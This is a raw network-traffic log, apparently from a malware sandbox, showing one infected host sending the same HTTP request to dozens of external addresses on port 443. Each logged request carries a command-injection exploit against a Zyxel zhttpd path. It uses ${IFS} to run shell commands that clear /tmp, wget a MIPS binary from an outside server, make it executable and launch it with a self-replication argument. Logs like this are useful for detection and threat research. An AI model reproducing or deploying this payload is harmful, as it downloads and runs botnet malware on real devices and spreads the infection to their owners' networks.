                                                Jan 12, 2024 18:15:41.927341938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                109192.168.2.2346154186.216.198.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.927396059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                110192.168.2.233289283.184.160.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.927470922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                111192.168.2.2335868201.252.52.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.927587986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                112192.168.2.235349640.3.198.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.927607059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                113192.168.2.23489089.157.116.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.927665949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                114192.168.2.235097420.80.146.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.927750111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                115192.168.2.234218662.43.109.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.927787066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                116192.168.2.2356266155.15.92.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.927876949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                117192.168.2.2332894218.143.6.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.927958012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                118192.168.2.234655614.170.48.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.928036928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                119192.168.2.2354384121.115.187.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.928071976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                120192.168.2.2349610209.176.248.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.928112984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                121192.168.2.234977251.231.3.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.928212881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                122192.168.2.234380253.54.178.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.928261995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                123192.168.2.234525277.126.116.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.928278923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                124192.168.2.2333846132.53.66.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.928355932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                125192.168.2.2357160139.253.245.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.928400993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                126192.168.2.233722469.166.255.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:42.935534000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                127192.168.2.235022624.187.142.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:42.935616970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                128192.168.2.2334224158.101.168.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:42.935715914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                129192.168.2.2344004112.132.28.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:43.940426111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                130192.168.2.235201669.167.212.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:43.940509081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                131192.168.2.234551441.246.220.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:43.940537930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                132192.168.2.2336110139.247.224.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:43.940691948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                133192.168.2.2342794164.210.228.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:44.944538116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                134192.168.2.2342306160.70.217.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:44.944571972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                135192.168.2.2343842194.53.63.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:44.944642067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                136192.168.2.2337754180.165.217.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:44.944643021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                137192.168.2.234436687.230.192.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:44.944647074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                138192.168.2.234262297.208.123.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:44.944689989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                139192.168.2.2344156178.107.22.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:44.944719076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                140192.168.2.2359076106.104.139.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:44.944753885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                141192.168.2.2358434125.117.176.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:44.944824934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                142192.168.2.2336532193.221.180.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:44.944864988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                143192.168.2.2353080103.6.183.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:44.944907904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                144192.168.2.2352084220.72.111.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:44.944931984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                145192.168.2.2342772115.113.245.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:44.945151091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                146192.168.2.2351464115.108.36.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:44.945226908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                147192.168.2.2344272164.193.159.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:44.945275068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                148192.168.2.234109698.44.14.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:45.948482990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                149192.168.2.2340832211.151.165.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:45.948499918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                150192.168.2.234480459.207.181.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:45.948499918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                151192.168.2.233675665.36.208.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:45.948549986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                152192.168.2.236098894.56.183.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:45.948571920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                153192.168.2.234136886.214.131.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:45.948609114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                154192.168.2.233963066.27.207.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:45.948652983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                155192.168.2.235202068.156.78.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:45.948659897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                156192.168.2.2349074137.198.114.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:45.948689938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                157192.168.2.235387244.94.49.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:45.948707104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                158192.168.2.2350578140.43.27.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:45.948755980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                159192.168.2.2342854160.81.239.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:45.948785067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                160192.168.2.235189845.71.197.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:45.948842049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                161192.168.2.235363612.231.47.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:45.948843956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                162192.168.2.235882663.109.130.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:45.949048996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                163192.168.2.2343836181.137.226.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:45.949074984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                164192.168.2.2346002200.80.58.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:45.949124098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                165192.168.2.2347732134.45.192.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:46.952794075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                166192.168.2.2341650182.167.21.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:46.952831984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                167192.168.2.236056082.145.133.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:46.952852011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                168192.168.2.234811265.123.52.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:46.952908039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                169192.168.2.23492905.208.187.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:46.952946901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                170192.168.2.2341530177.136.155.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:46.952990055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                171192.168.2.234819290.219.22.109443
                                                TimestampBytes transferredDirectionData
